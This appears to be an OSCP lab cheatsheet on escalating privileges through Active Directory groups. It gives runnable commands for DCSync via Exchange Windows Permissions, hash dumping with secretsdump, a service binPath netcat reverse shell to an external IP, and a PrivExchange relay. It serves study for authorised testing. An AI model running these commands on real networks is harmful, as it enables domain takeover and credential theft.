x

Vulnerable Groups

Admin groups but with a "MANDATORY LABEL\MEDIUM" context? Try UAC bypass technique.
https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-main.md#user-account-control-uac-bypass

17.6 - MIC & UAC

In OSCP-style Active Directory (AD) labs, “group exploitation” usually means abusing group memberships, delegated rights, or misconfigurations to escalate privileges or move laterally. “What groups is my user in, and what does that really let me do?”

  • Enumerating effective rights, not just direct memberships
  • Enumerating where those effective rights apply
  • Understanding what those rights allow us to do on the target
  • Following group nesting manually or with enumeration tools
  • Verifying who else is logging in to these systems

Any group change in AD? Log off then on again
Do not mix -Credential with token based abuse
ACL must be written and used by the same token
Bloodhound shows possible paths

Over-Privileged or Forgotten Groups (Low-Hanging Fruit)

A domain user is a member of:

  • Domain Admins
  • Enterprise Admins
  • Administrators (local on DCs or servers)
  • Backup Operators
  • Account Operators
  • Custom groups with dangerous rights
Group Why it's relevant
Domain Admins Full domain control
Backup Operators NTDS.dit access
Account Operators User/group modification
Server Operators Service abuse
Administrators Local admin everywhere
Custom IT/Support groups Often over-privileged

Some built-in groups grant privilege escalation without exploits.

  • Backup Operators → Can read NTDS.dit → dump domain hashes
  • Account Operators → Can modify users/groups (except DAs) → add yourself somewhere useful
  • Server Operators → Can start/stop services → abuse service paths

Write Permissions on Groups (ACL Abuse)

You have permissions like this on a group object:

  • WriteMembers
  • GenericWrite
  • GenericAll

Local Admin via Group Policy (GPO Groups)

A domain group added to local Administrators on servers or workstations
Applied via GPO

Why it matters

  • Local admin = credential theft = domain escalation
  • You’re not Domain Admin
  • But you’re in a group that is local admin on a server

That server has:

  • DA logged in
  • Service account creds
  • Cached domain credentials

DCSync via Exchange Windows Permissions

There are instructions on bloodhound for this but they don't always work for a couple of reasons.

Verify group membership (AD state)

  • Confirms if the user is actually in the group in AD and not the access token. AD updates immediately, Windows access tokens do not 
Get-DomainGroupMember "Exchange Windows Permissions" |
  Where-Object {$_.MemberName -eq "svc-alfresco"}

Add a user to the group (if not already present)

  • Modify the AD group membership, token is NOT updated yet. 
Add-DomainGroupMember -Identity "Exchange Windows Permissions" -Members "svc-alfresco"

Force windows to rebuild the access token so it includes the new group SID. 

logoff -> logon

Grant DCSync rights on the domain

  • Uses live logon token, Exchange Windows Permissions has writeDacl, allowing for adding replication rights. 
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync -Verbose

Dump domain secrets 

secretsdump.py htb.local/svc-alfresco@dc.htb.local

pypykatz registry --sam sam.hive system.hive

Server Operator Group

The Server Operator group is a special user group that often has access to powerful commands and settings on a computer system. This group is typically used for managing a server or for troubleshooting system problems. Server Operators are usually responsible for monitoring the server’s performance, managing system security, and providing technical support to users. They may also oversee installing software updates, creating and maintaining user accounts, and performing routine maintenance tasks.
https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

Look for a binary path with privileges 

services

Use the netcat binary 

upload /usr/share/windows-binaries/nc.exe

sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"

Start and stop the service while using a listener 

sc.exe stop VMTools

sc.exe start VMTools

Dangerous Built-in Groups Usage 

Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"

Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"

or 

([adsisearcher]"(AdminCount=1)").findall()

Trust relationship between domains 

nltest /trusted_domains

or 

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

PrivExchange Attack
Exchange your privileges for Domain Admin privs by abusing Exchange. You need a shell on a user account with a mailbox.
1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.

https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py 

python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx

https://github.com/G0ldenGunSec/PowerPriv 

powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
  1. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket)
  2. Profit using secretsdump, user can now dcsync and get another user's NTLM hash 
    python secretsdump.py xxxxxxxxxx -just-dc
Left-click: follow link, Right-click: select node, Scroll: zoom
x